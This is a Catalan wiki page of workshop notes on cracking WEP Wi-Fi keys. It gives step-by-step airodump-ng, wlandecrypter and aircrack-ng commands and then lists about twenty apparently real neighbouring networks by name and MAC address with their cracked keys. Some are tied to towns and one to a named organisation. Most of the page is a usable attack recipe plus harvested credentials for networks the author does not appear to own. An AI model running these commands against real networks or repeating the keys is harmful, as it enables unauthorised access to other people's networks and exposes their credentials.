Aircrack
Salta a la navegació
Salta a la cerca
Taller de desencriptació de Claus WEP (Sergi Tur), Festa Ubuntu 9.04: Fitxer:TallerClausWEP.pdf
els executables aircrack-ng i airodump estan a
/usr/sbin (compte perquè no es llisten) un cop estem en aquest directori, # cd /usr/sbin # ls -la
1) Airodump
sbin$ airodump-ng --help opcions: --ivs save only captured IVs --write <prefix> -> dum file prefix sbin$ airodump-ng --write hola eth3 si vols grabar el fitxer en el disc intern: sbin$ airodump-ng --write mnt/sda2/hola eth3 (substituir sda2 pel disc que correspongui)
la columna que importa és #Data
agafo la següent:
essid: WLAN_4E
bssid: 00:01:38:9A:C2:83
canal 6
WEP
paro el airodump (Ctrl-C) quan tinc 64 paquets (per desencriptar les WLAN_ amb 5 n'hi ha d'haver prou). Tinc els fitxers hola-01.cap i hola-01.txt en el mateix directori
$ ls hola*
2) fem el diccionari
sbin$ wlandecrypter --help wlandecrypter <bssid> <essid> [output file] wlandecrypter 00:01:38:9A:C2:83 WLAN_4E diccionari.txt S'ha generat el fitxer diccionari.txt $ ls diccionari.txt $ cat diccionari.txt
3) aircrack
sbin$ aircrack-ng --help opcions: -a 1 (força atacc WEP) -b <bssid> la MAC -e <essid> la interfície sbin$ aircrack-ng -a 1 -b <mac> -e <essid> -w diccionari <fitxer.cap> sbin$ aircrack-ng -a 1 -b 00:01:38:9A:C2:83 -e WLAN_4E -w diccionari.txt hola-01.cap KEY FOUND!! 58:30:30:30:31:33:38:41:45:42:31:34:45 ASCII: X000138AEB14E
Altres:
essid: WLAN_44 bssid: 00:60:B3:F3:D3:54 canal 9 WEP wlandecrypter 00:60:B3:F3:D3:54 WLAN_44 diccionari.txt aircrack-ng -a 1 -b 00:60:B3:F3:D3:54 -e WLAN_44 -w diccionari.txt hola2-01.cap KEY FOUND!! 5A:30:30:31:33:34:39:35:45:36:34:34:34 ascii: Z0013495E6444
essid: WLAN76A516 bssid: 00:13:F7:97:6A:20 canal 2 WEP wlandecrypter 00:13:F7:97:6A:20 WLAN76A516 diccionari.txt aircrack-ng -a 1 -b 00:13:F7:97:6A:20 -e WLAN76A516 -w diccionari.txt hola2-01.cap
essid: WLAN_B0 bssid: 00:02:CF:65:BA:D6 canal 9 WEP wlandecrypter 00:02:CF:65:BA:D6 WLAN_B0 diccionari.txt aircrack-ng -a 1 -b 00:02:CF:65:BA:D6 -e WLAN_B0 -w diccionari.txt hola-01.cap KEY FOUND!! 5A:30:30:30:32:43:46:36:38:37:31:42:30 ASCII: Z0002CF6871B0
essid: WLAN_C2 bssid: 00:01:38:B9:E5:3D canal 9 WEP wlandecrypter 00:01:38:B9:E5:3D WLAN_C2 diccionari.txt aircrack-ng -a 1 -b 00:01:38:B9:E5:3D -e WLAN_C2 -w diccionari.txt hola-01.cap KEY FOUND!! 58:30:30:30:31:33:38:42:41:38:45:43:32 ASCII: X000138BA8EC2
essid: WLAN_BC bssid: 00:02:CF:55:B0:0D canal 9 WEP wlandecrypter 00:02:CF:55:B0:0D WLAN_BC diccionari.txt aircrack-ng -a 1 -b 00:02:CF:55:B0:0D -e WLAN_BC -w diccionari.txt hola-01.cap KEY FOUND! 5A:30:30:30:32:43:46:35:37:35:41:42:43 ASCII: Z0002CF575ABC
essid: WLAN_70 ASCII: Z0002CFC19070
essid: WLAN_5C ASCII: X000138C2245C
essid: WLAN_92 ASCII: Z0002CF6C9992
essid: WLAN_52 ASCII: X000138C67152
essid: WLAN_B2 ASCII: Z0002CFDA8DB2
essid: WLAN_9A ASCII: Z0013497A829A
Bagà
essid: Germanes_Dominiques bssid: 00:1E:2A:19:07:5A canal 13 WEP wlandecrypter 00:1E:2A:19:07:5A Germanes_Dominiques diccionari.txt aircrack-ng -a 1 -b 00:1E:2A:19:07:5A -e Germanes_Dominiques hola-04.cap KEY FOUND!! 5A:30:30:31:33:34:39:35:45:36:34:34:34 ascii: Z0013495E6444
essid: WLAN_EE bssid: 00:02:CF:79:36:A0 canal 9 WEP wlandecrypter 00:02:CF:79:36:A0 WLAN_EE diccionari.txt aircrack-ng -a 1 -b 00:02:CF:79:36:A0 -e WLAN_EE -w diccionari.txt hola-08.cap KEY FOUND!! 5A:30:30:30:32:43:46:37:38:43:43:45:45 ] (ASCII: Z0002CF78CCEE )
WLAN_28: 5A303030324346394230443238
Local
essid: WLAN_1F bssid: canal 2 WEP KEY FOUND!! 5A:30:30:31:33:34:39:35:44:42:41:31:46 ascii: Z0013495DBA1F
essid: WLAN_00 bssid: canal 2? WEP KEY FOUND!! ascii: Z0002CF78D100
Viaplana
essid: Tele2 IX1V9417358
creat per Joan Quintana Compte, abril 2008